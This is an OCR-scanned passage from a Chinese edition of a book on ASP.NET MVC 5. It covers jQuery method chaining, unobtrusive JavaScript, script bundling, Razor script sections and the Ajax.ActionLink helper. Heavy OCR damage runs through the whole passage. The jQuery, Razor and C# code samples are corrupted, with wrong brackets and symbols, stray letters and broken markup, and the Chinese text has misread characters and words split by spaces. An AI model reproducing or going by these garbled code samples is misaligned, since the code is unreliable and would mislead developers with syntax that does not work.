$ ("a") .mouseover (function () { 


$ (this) 


-addClass ("highlight"); 


}) .mouseout (function () ( 


$ (this) 
}); 


.removeClass ("highlight"); 


关于 上 面 的 代码 ， 需 要 注意 以 下 两 个 地 方 : 

e 代码 中 用 到 的 所 有 依赖 于 封装 集 的 jQuery 方法 ， 像 mouseover 方法 ， 都 返回 同样 的 
jQuery 封装 集 。 这 就 是 说 可 以 继续 在 选择 的 元 素 上 调用 jQuery 方法 ， 而 不 用 再 重新 
选择 这 些 元 素 。 我 们 称 其 为 方法 链 。 

e 许多 常用 操作 在 jQuery 中 都 有 与 其 对 应 的 捷径 方法 (shortcut)。 设 置 mouseover 和 


mouseout 效果 是 一 种 常见 的 操作 ， 切 换 样式 类 型 也 是 一 种 常见 的 操作 。 可 以 使 


jQuery 捷径 方法 重 写 上 面 的 代码 段 ， 修 改 后 的 代码 如 下 : 


$("a").hover(function () ( 


$ (this) 
); 


E 


.toggleClass ("highlight"); 


三 行 代码 非常 强大 一 一 这 也 正 是 jQuery 如 此 出 色 的 原因 所 在 。 


4. jQuery 和 Ajax 


jQuery 包含 了 向 Web 服 务 器 回 发 异步 请 求 所 需要 的 所 有 功能 。 可 以 用 jQuery 来 生成 POST 
请 求 或 GET 请 求 ， 并 且 当 请 求 完 成 (或 出 现 错误 ) 时 jQuery 会 发 出 通知 。 尽 管 可 以 使 用 jQuery 发 


送 和 接受 XML 格 式 的 数据 ( 毕 竞 Ajax 中 的 X 代 表 的 是 XML)， 但 本 章 后 面 将 会 展示 ， 使 用 


HIML、 文 本 或 JavaScript Object Notation(JSON) 格 式 的 数据 是 非常 繁琐 的 。 jQuery 使 Ajax 变 得 


简单 。 


事实 上 ，jQuery 简 化 了 许多 任务 ， 已 经 改变 了 Web 开 发 人 员 编 写 脚本 代码 的 方式 。 


8.1.2 非 侵 入 式 JavaScript 


在 Web 早 期 阶段 , 也 就 是 在 jQuery 出 现 以 前 , 在 同一 个 文件 中 混杂 JavaScript 代 码 和 HTML 
标记 是 非常 流行 的 做 法 .将 JavaScript 代 码 作为 某 个 特性 的 值 放 入 HIML 元 素 中 再 正常 不 过 了 。 


你 可 能 见 过 下 


面 这 样 的 onclick 处 理 程序 : 
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«div onclick-"javascript:alert('click');"»Testing, testing«/div» 


当时 我 们 可 能 会 在 标记 中 嵌入 JavaScript 代 码 ， 因 为 没有 更 简单 的 方法 可 以 用 来 捕获 单 击 
事件 。 尽 管 嵌 入 的 JavaScript 代 码 可 以 实现 事件 捕获 ,但 是 这 样 的 代码 不 够 整洁 。jQuery 改 变 了 这 
种 状况 ， 因 为 jQuery 提供 了 查找 元 素 和 捕获 单 击 事件 的 更 好 方法 。 现 在 可 以 从 HTML 特性 中 
移 除 JavaScript 代 码 了 。 事 实 上 ， 可 将 JavaScript 代 码 与 HTML 完全 分 离 。 

非 侵入 式 JavaScript(unobtrusive JavaScripb 很 好 地 实践 了 JavaScript 代 码 和 标记 的 分 离 。 可 
将 所 有 需要 的 脚本 代码 打包 到 js 文件 中 。 如 果 查 看 视图 的 源 代码 ， 你 将 不 会 看 到 有 JavaScript 
代码 嵌入 在 标记 中 。 即 使 查看 视图 壮 染 的 HTML 标 记 ， 也 看 不 到 任何 JavaScript 代 码 ， 脚 本 留 
下 的 唯一 痕迹 是 一 个 或 多 个 引用 JavaScript 文 件 的 <scrip 人 标签 。 

我 们 可 能 已 经 发 现 非 侵 入 式 JavaScript 之 所 以 具有 吸引 力 ， 主 要 是 因为 它 遵循 了 MVC 框 
架设 计 模式 所 提倡 的 关注 点 分 离 。 它 实现 了 内 容 显示 (由 标记 实现 ) 和 交互 行为 (由 JavaScript 实 
现 ) 的 分 离 。 除 此 之 外 ， 非 侵入 式 JavaScript 还 有 其 他 优势 。 例 如 ， 将 所 有 的 脚本 代码 保存 在 
单独 的 可 下 载 文件 中 让 浏览 器 能 够 在 本 地 缓存 脚本 文件 ， 从 而 提高 网 站 的 性 能 。 

非 侵入 式 JavaScript 也 支持 在 站 点 上 使 用 渐进 增强 (progressive enhancemenb 的 策略 。 渐 
进 增强 关注 的 是 传递 的 内 容 。 只 要 查看 内 容 的 设备 或 浏览 器 支持 像 脚本 和 样式 表 这 样 的 特性 ， 
页 面 就 会 展现 更 高 级 的 内 容 ， 使 图 像 具 有 动画 效果 等 。Wikipedia 对 渐进 增强 有 一 个 很 好 的 概 
述 ， 参 见 http://en.wikipedia.org/wiki/Progressive_enhancement。 

ASP.NET MVC 5 对 JavaScript 采 用 非 侵入 式 的 方法 。 框架 将 元 数据 放 入 HTML 特 性 中 ,而 
不 是 将 JavaScript 代 码 注入 视图 来 实现 某 种 功能 特性 ( 像 客户 端 验证 )。 使 用 jQuery 技术 ， 框 架 
能 够 查找 和 解释 元 数据 ， 然 后 将 行为 附加 到 所 有 使 用 外 部 脚本 文件 的 元 素 上 。 由 于 有 了 非 侵 
入 式 JavaScript 工 作 ， 才 使 得 ASPNET MVC 的 Ajax 特性 支持 渐进 增强 。 如 果 用 户 浏览 器 不 支 
持 脚 本 ， 访 问 的 站 点 也 仍然 会 正常 运作 ， 但 不 会 提供 好 的 功能 ， 像 客户 端 验证 等 。 

为 了 解 非 侵入 式 JavaScript 的 工作 原理 ， 下 面 首先 学 习 如 何在 MVC 应 用 程序 中 使 用 
jQuery。 


8.1.3 jQuery 的 用 法 


当 使 用 Visual Studio 项 目 模板 创建 新 的 ASPNET MVC 项 目 时 ， 它 会 默认 生成 使 用 jQuery 
需要 的 所 有 内 容 : 站 点 布局 中 已 经 包含 并 引用 脚本 文件 ， 可 
用 于 应 用 程序 中 的 任何 视图 。 我 们 来 看 看 都 预先 配置 了 哪些 
东西 ， 这 样 有 需要 的 时 候 就 知道 如 何 添加 或 修改 功能 。 

每 个 新 项 目 都 包含 一 个 Scripts 文 件 夹 ， 其 中 带 有 多 个 js 
文件 ， 如 图 8-1 所 示 。 

jQuery 核心 库 是 一 个 名 为 jquery-<version>.js 的 文件 ， 
Visual Studio 2013/ASPNET MVC 5 发 布 时 其 版 本 号 是 
1.10.2。 这 个 文件 中 包含 了 jQuery 源 代码 的 易 读 注释 版 本 。 
因为 jQuery 非常 常用 ， 站 点 布局 (/Views/Shared/ 
_Layout.cshtml) 的 footer 部 分 包含 了 一 个 jQuery 脚本 引用 。 因 
Jb, 默认 情况 下 ， 站 点 的 任何 视图 中 都 可 以 使 用 jQuery。 在 没有 使 用 默认 布局 的 任何 视图 中 ， 
或 者 如 果 我 们 在 站 点 布局 中 删除 了 jQuery 脚本 引用 ， 添 加 jQuery 脚本 引用 也 是 很 容易 的 ， 只 
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需要 使 用 直接 脚本 引用 或 者 使 用 预 配置 的 jQuery 捆绑 。 
要 添加 脚本 引用 ， 可 包含 如 下 所 示 的 代码 : 


«script src-"-/Scripts/jquery-1.10.2.js"»«/script» 


注意 , ASPNETMVC 的 Razor 视 图 引擎 会 把 这 里 的 -~ 操作 符 解析 为 当前 网 站 的 根 目录 , 即 
便 它 出 现在 了 src 特 性 中 。 另 外 一 个 值得 注意 的 地 方 是 ，HIML 5 中 不 需要 指定 类 型 特性 为 
text/javascript。 

虽然 简单 的 脚本 引用 (如 前 面 所 示 ) 是 有 效 的 ， 但 是 这 种 方法 依赖 于 版 本 : 如 果 想 要 更 新 
到 更 新 版 本 的 jQuery， 就 必须 在 代码 中 查找 脚本 引用 ， 并 使 用 新 版 本 号 加 以 蔡 换 。 更 好 的 在 
视图 中 包含 jQuery 引用 的 方法 是 使 用 内 置 的 、 版 本 无 关 的 jQuery 脚本 捆绑 。 
/Views/Shared/_Layout.cshtml 中 的 脚本 引用 就 采用 了 这 种 方法 ， 如 下 所 示 : 


GScripts.Render ("~/bundles/jquery") 


除了 简化 将 来 的 脚本 更 新 ， 这 种 捆绑 引用 还 提供 了 其 他 许多 好 处 ， 例 如 在 发 布 模式 下 自 
动 使 用 微小 脚本 ， 以 及 将 脚本 引用 集中 到 一 个 位 置 ， 从 而 只 需 在 一 个 位 置 进行 更 新 。 本 章 结 
束 时 将 更 详细 地 讨论 捆绑 和 微小 。 


注意 ”上面 的 调用 将 泻 染 /App_StartBundleConfig.cs 中 预定 义 的 “jquery” 脚 本 
捆绑 。 

这 个 捆绑 利用 了 ASPNET 中 的 捆绑 和 微小 特性 ， 该 特性 利用 版 本 号 中 包含 
的 通配符 匹配 ， 自 动 优先 使 用 jQuery 的 轻 量 版 本 。 


public static void RegisterBundles (BundleCollection bundles) 
t 
bundles.Add(new ScriptBundle ("-/bundles/jquery").Include( 
"^/Scripts/jquery-(version).js")); 


//Other bundles removed for brevity... 
H 


1. jQuery 和 NuGet 


ASPNET 项 目 模板 实际 上 使 用 了 NuGet 程 序 包 将 jQuery 库 包含 进来 。 这 样 , 就 可 以 使 用 标 
准 的 NuGet 程 序 包 更 新 方法 来 更 新 到 jQuery 的 新 版 本 。 使 用 NuGet 程 序 包 包含 脚本 的 方法 再 加 
上 版 本 无 关 的 捆绑 引用 ， 意 味 着 更 新 项 目 来 使 用 新 版 本 的 jQuery 十 分 容易 。 当 然 ， 我 们 仍 需 
要 测试 基于 jQuery 的 代码 在 新 版 本 的 jQuery 下 工作 良好 ， 但 是 我 们 并 不 需要 花费 大 量 时 间 来 
下 载 和 添加 脚本 ， 然 后 再 手动 修改 脚本 引用 。 

使 用 jQuery NuGet 程 序 包 的 真正 价值 在 于 依赖 检查 。 任 何 包 含 基于 jQuery 的 库 的 NuGet 程 
序 包 会 说 明 兼容 的 jQuery 版 本 ， 保 证 二 者 的 一 致 性 。 例 如 ， 如 果 更 新 了 jQuery Validation 程 序 
包 (本 章 后 面 讨论 ), NuGet 会 保证 升级 到 的 jQuery Validation 新 版 本 仍然 可 以 在 已 安装 的 jQuery 
版 本 下 正常 使 用 。 
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2. 自 定义 脚本 


当 编写 自 定义 的 JavaScript 代 码 时 ， 我 们 可 以 把 这 些 代码 添加 到 Scripts 目 录 下 的 新 脚本 文 
件 中 (除非 想 编写 侵入 性 JavaScript, 此 时 直接 把 脚本 代码 嵌入 视图 中 , 但 是 这 样 做 我 们 可 能 会 
失去 25 个 业绩 积分 )。 因 为 新 项 目的 Scripts 目 录 已 经 包含 

十 几 个 不 是 我 们 编写 的 脚本 文件 (通常 叫做 供应 商 脚 。 P e metet d 
7k). 所 以 为 自 定义 脚本 创建 一 个 单独 的 、 应 用 程序 特定 。 | ww E: 
的 子 目录 是 一 个 好 习惯 。 这 样 一 来 ， 我 们 自己 和 其 他 使 ER 


用 代码 的 开发 人 员 就 很 容易 知道 哪些 脚本 是 库 ， 哪 些 是 

自 定义 的 、 应 用 程序 特定 的 脚本 。 常 见 的 约定 是 将 自 定 Ne 

义 脚本 放 到 /Scripts/App 子 目录 中 。 SR ap r 
例如 ， 如 果 想 把 本 章 开始 部 分 的 代码 放 到 一 个 自 定 se 


IT. javery.validate-vsdoc js 


义 脚 本 文件 中 ， 可 以 首先 创建 一 个 新 的 /Scripts/App 子 目 
录 , 然后 右 击 添加 一 个 名 为 MusicScripts.js 的 新 JavaScript 
文件 ， 如 图 8-2 所 示 。 
MusicScripts.js 文 件 如 下 所 示 : 
$ (function () { 
$("#album-list img").mouseover(function () ( 


$(this).animate(( height: '+=25', width: '+=25' ]) 
.animate(( height: '--25', width: '--25' ]); 


H); 
}); 


现在 应 用 程序 中 就 可 以 使 用 这 个 脚本 了 ， 但 是 要 在 应 用 程序 中 实际 使 用 MusicScripts,js， 
还 需要 另 一 个 script 标 签 。 这 其 实 没有 我 们 想象 得 那么 简单 。 在 泻 染 的 文档 中 这 个 script 标 签 必 
须 出 现在 jQuery 的 script 标 签 后 面 ， 因 为 MusicScripts.js 需 要 jQuery 的 支持 ， 而 浏览 器 会 按照 脚 
本 在 文档 中 出 现 的 顺序 进行 加 载 。 

如 果 脚 本 包含 了 整个 应 用 程序 要 使 用 的 功能 ， 可 以 把 script 标 签 放 在 _Layout 视 图 中 ， 但 
仍 需要 放 在 jQuery 的 script 标 签 之 后 。 在 这 个 示例 中 , 需要 在 应 用 程序 的 首页 中 使 用 这 些 脚本 ， 
我 们 可 以 把 它 添加 到 控制 器 HomeController 中 Index 视 图 (/Views/Home/Index.cshtml) 内 .这 就 带 
来 了 一 个 问题 : 单独 视图 的 内 容 在 @RenderBody0 调 用 中 泻 染 ， 该 调用 出 现在 _Layout 视 图 末 
尾 的 脚本 捆绑 引用 之 前 ， 但 是 自 定义 的 脚本 依赖 于 jQuery， 必 须 出 现在 jQuery 引用 之 后 。 下 
面 代码 中 添加 到 默认 的 _Layout 视 图 中 的 注释 说 明了 这 个 问题 : 


«body» 
«div class-"navbar navbar-inverse navbar-fixed-top"» 
X!-- content removed for clarity --» 
«/div» 
«div class-"container body-content"» 
<!-- any script tags in a view will be written here --» 
GRenderBody () 
«hr /» 
«footer» 
Xp»&copy; 8DateTime.Now.Year - My ASP.NET Application«c/p» 
«/footer» 
«/div» 
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<!-- jQuery is not included until this bundle is written --> 
GScripts.Render ("-/bundles/jquery") 
QGScripts.Render ("-/bundles/bootstrap") 
QRenderSection("scripts", required: false) 
</body> 


这 个 问题 的 解决 方法 是 在 预定 义 的 scripts 节 中 泻 染 自 定义 脚本 ， 接 下 来 将 介绍 这 方面 的 
内 容 。 


注意 为 什么 不 在 Layout 视 图 的 顶部 包含 标准 的 脚本 引用 ， 以 便 任 何 视图 的 脚 
本 都 能 使 用 jQuery? 这么 做 是 出 于 性 能 考虑 。 一 般 推荐 的 做 法 是 将 JavaScript 引 
用 放 到 HTMI 文 档 的 结尾 、body 结 束 标签 之 前 , 这 样 脚本 引用 就 不 会 妨碍 并 行 下 
载 其 他 页 面 资 源 (图 片 和 CSS)。Yahoo 的 “Best Practices for Speeding Up Your Web 
Site” 中 讨论 了 这 条 指导 原则 : http://developer.yahoo.com/performance/rules. 
html#js_bottom, 


3. 在 节 中 放置 脚本 


除了 在 单独 的 视图 中 内 联 写 入 脚本 标签 ， 向 输出 中 注入 脚本 的 另 一 种 方法 是 定义 用 来 放 
置 脚本 的 Razor 节 。 尽 管 我 们 可 以 添加 自 定义 的 节 , 但 ASPNETMVC 5 应 用 程序 默认 的 _Layout 
视图 中 包含 有 一 个 节 ， 我 们 可 以 用 来 包含 依赖 jQuery 的 脚本 。 包 含 的 节 的 名 称 是 Scripts， 它 
出 现在 jQuery 加 载 后 ， 以 便 我 们 的 脚本 依赖 于 jQuery。 

现在 可 以 在 引用 布局 的 任何 内 容 视图 中 添加 脚本 节 来 注入 视图 特定 的 脚本 。 下 例 显示 了 
如 何 将 这 个 脚本 节 添 加 到 /Views/Home/Index.cshtml 视 图 的 底部 : 


«ul class="row list-unstyled" id="album-list"> 
Gforeach (var album in Model) 
t 
<li class-"col-1g-2 col-md-2 col-sm-2 col-xs-4 container"» 
«a href-"(Url.Action("Details", "Store", new ( id = album.AlbumId }) "> 
«img alt-"Qalbum.Title" src-"(Url.Content( Galbum.AlbumArtUrl)" /> 
«h4»0album.Title«/h4» 
«/a» 
</li> 
} 
</ul> 


@section Scripts { 
<script src="~/Scripts/APP/MusicScripts.js"> </script> 
} 
</div> 
上 面 介绍 的 方法 可 以 设置 脚本 标签 的 具体 位 置 ， 以 确保 需要 的 脚本 以 合适 的 顺序 出 现 。 默 
认 情 况 下 ，MVC 5 应 用 程序 中 的 _Layout 视 图 把 脚本 演 染 在 页 面 底部 ， 在 body 标 签 关闭 之 前 。 


注意 本 例 包含 在 MvcMusicStore.C08.jQuery 代 码 示例 中 。 


179 


180 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


4. Scripts 目录 下 的 其 他 文件 


在 Scripts 目 录 下 的 所 有 其 他 js 文件 是 什么 呢 ? 新 ASPNET MVC 5 应 用 程序 包含 以 下 脚本 
引用 : 


e references.js 


bootstrap.js 

€ bootstrap.min.js 

e jquery-1.10.2.intellisense.js 

e jquery-1.10.2.js 

e jquery-1.10.2.min.js 
jquery-1.10.2.min.map 
jquery.validate-vsdoc.js 
jquery.validate.js 
jquery.validate.min.js 
jquery.validate.unobtrusive.js 


jquery.validate.unobtrusive.min.js 
e modernizr-2.6.2.js 

® respond.js 

e respond.min.js 

真是 一 个 庞大 的 列表 ! 但 是 , 实际 上 其 中 只 有 6 个 库 。 为 了 缩小 这 个 列表 ,我 们 首先 讨论 
实际 上 不 是 JavaScript 库 的 一 此 文件 。 

_references.js 是 项 目 中 使 用 的 JavaScript 库 的 列表 ， 使 用 三 个 斜 杠 (///) 的 注释 编写 。Visual 
Studio 使 用 这 个 文件 来 确定 在 整个 项 目的 全 局 JavaScript 智 能 感知 中 包含 哪些 库 ( 当 然 还 会 包 
含 其 他 页 面 上 的 脚本 引用 ， 不 过 这 样 的 引用 是 在 单独 的 视图 上 包含 的 )。Mads Kristensen 的 一 
篇 文章 详细 说 明了 _references.js 的 工作 原理 及 其 产生 过 程 : http://madskristensen.net/post/the- 
story-behind- referencesjs。 

Visual Studio 根 据 方法 名 和 脚本 中 包含 的 任何 内 联 三 斜 杠 注释 显示 智能 感知 。 然而, 为 了 
包含 更 多 有 用 的 智能 感知 信息 (如 参数 描述 或 使 用 提示 )， 一 些 脚本 包含 完整 的 智能 感知 文档 ， 
其 名 称 中 包含 “vsdoc” 和 “intellisense”。 这 两 种 格式 在 概念 上 是 相同 的 ，intellisense 格 式 实 
质 上 是 智能 感知 JavaScript 文 档 格式 的 2.0 版 本 , 包含 了 更 高 级 的 信息 。 我 们 不 需要 直接 引用 这 
些 文件 ， 或 把 它们 发 送 到 客户 端 。 

另外 还 有 几 个 .minjs 文 件 。 每 个 文件 都 包含 另外 一 个 对 应 脚本 文件 的 微小 化 版 本 。 
JavaScript 微 小 化 是 通过 删除 注释 、 进 而 缩短 变量 名 来 缩小 JavaScript 文 件 的 过 程 ， 以 及 其 他 缩 
小 文件 大 小 的 过 程 。 微 小 化 的 JavaScript 文 件 能 够 节省 带宽 ， 减 少 客户 端 解析 ， 所 以 对 于 提高 
性 能 很 有 帮助 ， 但 是 阅读 这 种 文件 很 困难 。 因 此 ， 项 目 模板 中 同时 包含 了 微小 文件 和 非 微小 
文件 。 这 样 一 来 ， 我 们 就 可 以 阅读 易 读 的 带 注释 版 本 并 进行 调试 ， 而 在 生产 环境 中 使 用 微小 
版 本 ， 以 获得 性 能 优势 。 这 些 工 作 都 是 由 ASPNET 捆 绑 和 微小 系统 蔡 我 们 完成 的 : 在 调试 模 
式 下 ， 系 统 提供 没有 微小 化 的 版 本 ; 在 发 布 模式 下 ， 系 统 自动 找到 并 提供 .minjs 版 本 。 

jQuery 也 包含 一 个 minmap:js 版 本 。 这 是 一 个 源 代码 映射 文件 。 源 代码 映射 是 一 种 新 兴 的 
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标准 ， 人 允许 浏览 器 将 微小 化 的 、 编 译 后 的 代码 映射 为 原来 编写 的 代码 。 如 果 在 支持 源 代码 映 
射 的 浏览 器 中 调试 JavaScript， 并 且 所 有 调试 的 版 本 具有 一 个 源 代码 映射 文件 ， 那 么 原来 编写 
的 源 代码 就 会 显示 出 来 。 

介绍 完 这 些 非 JavaScript 库 的 文件 后 ， 脚 本 列表 小 多 了 。 更 新 后 的 列表 如 下 所 示 ， 我 们 将 
按 顺 序 讨论 他 们 : 

e jquery-1.10.2.js 

e Bootstrap.js 

e Respond.js 

e Modernizr-2.6.2.js 

® jquery.validate.js 

® jquery.validate.unobtrusive.js 

我 们 已 经 对 jQuery 做 了 一 些 讨 论 。 

Boostrapjs 包 含 一 组 基于 jQuery 的 插件 ， 它 们 通过 添加 额外 的 交互 行为 来 增强 Bootstrap。 
例如 ，Modals 插 件 可 显示 简单 的 、 使 用 Bootstrap 样 式 的 模 态 化 界面 ， 它 使 用 jQuery 管理 事件 
和 动态 页 面 显示 。 

Respond.js 是 一 个 很 小 的 JavaScript 库 ， 包 含 它 是 因为 Bootstrap 要 用 到 它 。Respond.js 就 属 

于 所 谓 的 polyfill， 即 让 旧 浏 览 器 支持 新 浏览 器 标准 的 一 个 JavaScript 库 。 对 于 Respond.js， 添 加 
的 新 浏览 器 标准 是 正 6-8 所 没有 的 最 小 宽度 和 最 大 宽度 CSS3 媒 体 查 询 支 持 。 因 此 ，Respond.js 
使 Bootstrap 的 响应 性 CSS 能 够 很 好 地 工作 在 正 6-8 上 。 原 生 支持 CSS3 媒 体 查询 的 新 浏览 器 则 
会 忽略 该 库 。 
JModernizrjs 是 一 个 JavaScript 库 , 它 通过 改造 老 版 本 浏览 器 来 帮助 我 们 构建 富有 现代 气息 
的 应 用 程序 。 例 如 ，Modernizr 的 一 个 重要 工作 就 是 在 老 版 本 浏览 器 中 启用 新 的 HTML 5 元 素 
(比如 header、nav 和 menu)， 而 这 些 老 版 本 浏览 器 ( 像 Internet Explorer 6) 本 身 不 支持 HTML 5 元 
素 。Modernizr 也 可 以 帮助 我 们 检测 特定 浏览 器 是 否 支 持 一 些 高 级 功能 ， 像 定位 位 置 
(geolocation) 和 绘画 画布 (drawing canvas)» 

名 称 中 包含 “unobtrusive” 字 样 的 文件 是 由 Microsoft 编 写 的 。 这 些 非 侵入 式 脚 本 集成 了 
jQuery 和 ASPNET MVC 框 架 ， 从 而 提供 了 前 面 提 到 的 非 侵入 式 JavaScript 特 性 。 如 果 要 实现 
ASPNETMVC 框 架 的 Ajax 特性 ， 就 需要 使 用 这 些 文件 ， 本 章 稍 后 将 介绍 这 些 脚本 的 用 法 。 

到 目前 为 止 ， 已 经 介绍 了 jQuery 的 内 容 以 及 如 何在 应 用 程序 中 引用 脚本 ， 下 面 继续 介绍 
ASPNET MVC 框 架 直接 支持 的 Ajax 特性 。 


82 Ajax 辅助 方法 


前 面 的 章节 已 经 介绍 了 ASPNET MVC 框 架 中 的 HIML 辅助 方法 。 我 们 可 以 使 用 HTML 辅 
助 方法 创建 表单 和 指向 控制 器 操作 的 链接 。 在 ASPNET MVC 框 架 中 还 包含 一 组 Ajax 辅助 方 
法 ， 它 们 也 可 以 用 来 创建 表单 和 指向 控制 器 操作 的 链接 ， 但 不 同 的 是 它们 是 异步 进行 的 。 当 
使 用 这 些 辅助 方法 时 ， 不 用 编写 任何 脚本 代码 来 实现 程序 的 异步 性 。 

在 后 台 , 这 些 Ajax 辅助 方法 依赖 于 非 侵入 式 MVC 的 jQuery 扩展 。 如 果 使 用 这 些 辅助 方法 ， 
我 们 就 需要 引入 脚本 文件 jquery.unobtrusive-ajaxjs， 并 在 视图 中 添加 此 脚本 引用 。 这 与 原来 的 
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MYVC 版 本 不 同 ， 原 来 会 在 项 目 模板 中 默认 包含 这 个 脚本 ， 并 在 Layout 视图 中 包含 该 脚本 引 
用 。 下 一 节 将 学 习 如 何 把 jqueryunobtrusive-ajax.js 脚 本 添加 到 使 用 Ajax 的 项 目 中 。 


注意 ”人 必须 引用 jqueryunobtrusive-ajax.js 肢 本， 才能 让 Ajax 辅助 方法 的 Ajax 功能 
生效 。 如 果 在 使 用 Ajax 辅助 方法 时 发 生 问 题 ， 这 是 应 该 首先 检查 的 地 方 。 


8.2.1 在 项 目 中 添加 非 侵入 式 Ajax 脚本 


幸好 ， 使 用 NuGet 在 项 目 中 添加 非 侵入 式 Ajax 脚 本 十 分 容易 。 右 击 项 目 ， 打 开 Manage 
NuGet Package 对 话 框 ， 并 搜索 Microsoft jQuery Unobtrusive Ajax， 如 图 8-3 所 示 。 另 一 种 方法 
是 在 Package Manager Console 中 使 用 如 下 命令 进行 安装 : Install-Package Microsoft jQuery. 
Unobtrusive.Ajax « 


? Installed packages SubleOnly ~ Sort bp Relevance 


"qu, Microsoft jQuery Unobtrusive Ajax LIÉ 
四 jnuey plugin that unobtrusively sets up 
Fuery Ajar. 


sgg Microsoft jQuery Unobtrusive Validation 
四 (Query plugin that unobtrusively sets up Quen; Validation 


图 p 
"ey at ed ences enit Lr ak pii 


nee, Kuery UI (Combined Library) 
The ful Query U ibrary as a single combined fle. Includes the 


you 
ee 
[Er ee NE 


Mega re he hy of option for customization. That m... 


JQvery Unobtrusive Ajax 
B Legacy package, jQuery Ajen Unobtnusive is now included in 
Verosoft Query Unobtrusve Ajar package. 


Unobtrusive Validation 
wu Legacy package, jQuery Validation Unobtrusive is 
incudelinthe Merci jQuen, Uncbinzive Validation! pac- 


rtr WPRCOG 


图 8-3 

可 以 把 脚本 引用 添加 到 应 用 程序 的 _Layout 视 图 中 , 也 可 以 仅 添加 到 使 用 Ajax 辅助 方法 的 
视图 中 。 除 非 在 网 站 中 发 出 大 量 Ajax 请 求 ， 否 则 建议 仅 把 脚本 引用 添加 到 单独 的 视图 中 。 

本 例 显示 了 如 何 把 Ajax 请 求 添加 到 Home Index 视 图 (Views/Home/Index.cshtml) 的 Scripts 
节 中 。 既 可 以 手动 输入 脚本 引用 ， 也 可 以 在 Solution Explorer 中 把 jQuery 文件 拖 放 到 视图 上 ， 
Visual Studio 会 自动 添加 脚本 引用 。 

更 新 后 的 视图 应 该 包含 下 面 的 脚本 引用 (假设 按照 前 面 的 示例 添加 了 MusicScriptsjs 
引用 ): 

@section Scripts ( 

«script src-"-/Scripts/App/MusicScripts.js"»«/script» 


<script src-"-/Scripts/jquery.unobtrusive-ajax.min.js"» </script> 
} 


182 


第 8 章 Ajax 


8.2.2 Ajax 的 ActionLink 方 法 


在 Razor 视 图 中 ，Ajax 辅 助 方法 可 以 通过 Ajax 属性 访问 。 与 HIML 辅助 方法 类 似 ，Ajax 属 
性 上 的 大 部 分 Ajax 辅助 方法 都 是 扩展 方法 (除了 AjaxHelper 类 型 之 外 )。 

Ajax 属性 的 ActionLink 方 法 可 创建 一 个 具有 异步 行为 的 锚 标 签 。 假 如 要 在 打开 的 页 面 的 
底部 为 MVC Music Store 添 加 一 个 "daily deal" 链 接 ， 要 求 在 用 户 单 击 链接 时 是 在 当前 页 面 上 显 
示 打 折扣 专辑 的 详细 信息 ， 而 不 是 在 一 个 新 页 面 中 显示 。 

为 了 实现 这 个 效果 ， 需 要 在 视图 Views/Home/Index.cshtml 中 已 有 专辑 列表 的 后 面 添加 如 
FRE: 

<div id="dailydeal"> 

@Ajax.ActionLink ("Click here to see today's special!", 
"DailyDeal", 
null, 
new AjaxOptions 


t 


UpdateTargetId - "dailydeal", 
InsertionMode - InsertionMode.Replace, 
HttpMethod - "GET" 

) 


new (8class = "btn btn-primary")) 

«/div» 

ActionLink 方 法 的 第 一 个 参数 指定 了 链接 文本 ， 第 二 个 参数 是 要 异步 调用 的 操作 的 名 称 。 
类 似 于 同名 的 HTML 辅助 方法 ，Ajax 辅 助 方法 ActionLink 也 提供 了 各 种 重 载 版 本 ,用 来 传递 控 
制 器 名 称 、 路 由 值 和 HTML 特 性 。 

对 于 HTML 辅 助 方法 与 Ajax 辅 助 方法 ， 显 著 不 同 的 是 AjaxOptions 参 数 。 该 参数 指定 了 发 
送 请 求 和 处 理 服务 器 返回 的 结果 的 方式 。 参 数 中 还 包括 用 来 处 理 错误 、 显 示 加 载 元 素 、 显 示 
确认 对 话 框 等 的 选项 。 在 这 个 示例 中 ，AjaxOptions 参 数 的 选项 指定 了 要 使 用 来 自 服务 器 的 响 
应 元 素来 替换 id 值 为 “dailydeal” 的 元 素 。 

最 后 一 个 参数 htmlAttributes 指 定 了 为 链接 使 用 的 HTML 类 ， 以 应 用 一 个 基本 的 Bootstrap 
按钮 样式 。 

为 得 到 服务 器 的 响应 ， 需 要 在 控制 器 HomeController 上 添加 一 个 DailyDeal 操 作 : 


public ActionResult DailyDeal() 
t 


var album = GetDailyDeal(); 


return PartialView(" DailyDeal", album); 
H 


// Select an album and discount it by 50$ 
private Album GetDailyDeal() 
t 
var album — storeDB.Albums 
.OrderBy(a => System.Guid.NewGuid()) 
本 (j 


183 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


album.Price *= 0.5m; 
return album; 
H 


LINQ 查询 的 随机 排序 
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上 面 的 代码 使 用 Jon Skeet 在 StackOverflow 上 提出 的 一 个 巧妙 的 方法 来 选择 一 个 随机 专辑 。 
因为 新 Guid 是 按 半 随机 的 顺序 生成 的 ， 所 以 按照 NewGuid 进 行 排序 实际 上 打 乱 了 它们 的 顺序 。 
上 面 的 例子 在 数据 库 中 打 乱 ， 要 把 这 项 工作 带 到 Web 服 务 器 上 ， 需 要 在 OrderBy 语 句 之 前 添加 
一 个 AsEnumerable 调 用 ， 以 强制 EF 返回 完整 列表 。 

更 多 信息 请 参考 StackOverflow 上 的 讨论 帖 : http://stackoverflow.com/q/654906。 


Ajax 操作 链接 的 目标 操作 的 返回 值 是 纯 文 本 或 HIML。 在 这 个 示例 中 ， 将 通过 泻 染 一 个 部 
分 视图 来 返回 HTML。 下 面 的 Razor 代 码 就 在 项 目的 Views/Home 文 件 夹 下 的 _DailyDeal. cshtml 
文件 中 。 


(model MvcMusicStore.Models.Album 
«div class="panel panel-primary"» 


«div class-"panel-heading"» 
<h3 class-"panel-title"»Your daily deal: G8Model.Title«c/h3» 


«/div» 
«div class-"panel-body"» 
«p» 
«img alt-"G8Model.Title" src-"QUrl.Content (éModel.AlbumArtUrl)" /> 
«/p» 


«div id-"album-details"» 
<p> 
<em>Artist:</em> 
GModel.Artist.Name 
</p> 
<p> 


<em>Price:</em> 
GString.Format("(0:F)", Model.Price) 


</p> 
@Html.ActionLink ("Add to cart", "AddToCart", 
"ShoppingCart", 
new ( id = Model.Albumid ], 
new ( class = "btn btn-primary" }) 
«/div» 
«/div» 


«/div» 


_DailyDeal 使 用 了 一 个 标准 的 ( 非 Ajax)ActionLink， 所 以 单 击 它 将 离开 首页 。 这 说 明了 重 
要 的 一 点 :能够 使 用 Ajax 链 接 ， 并 不 意味 着 应 该 在 所 有 地 方 都 使 用 Ajax 链 接 。 我 们 可 能 需要 
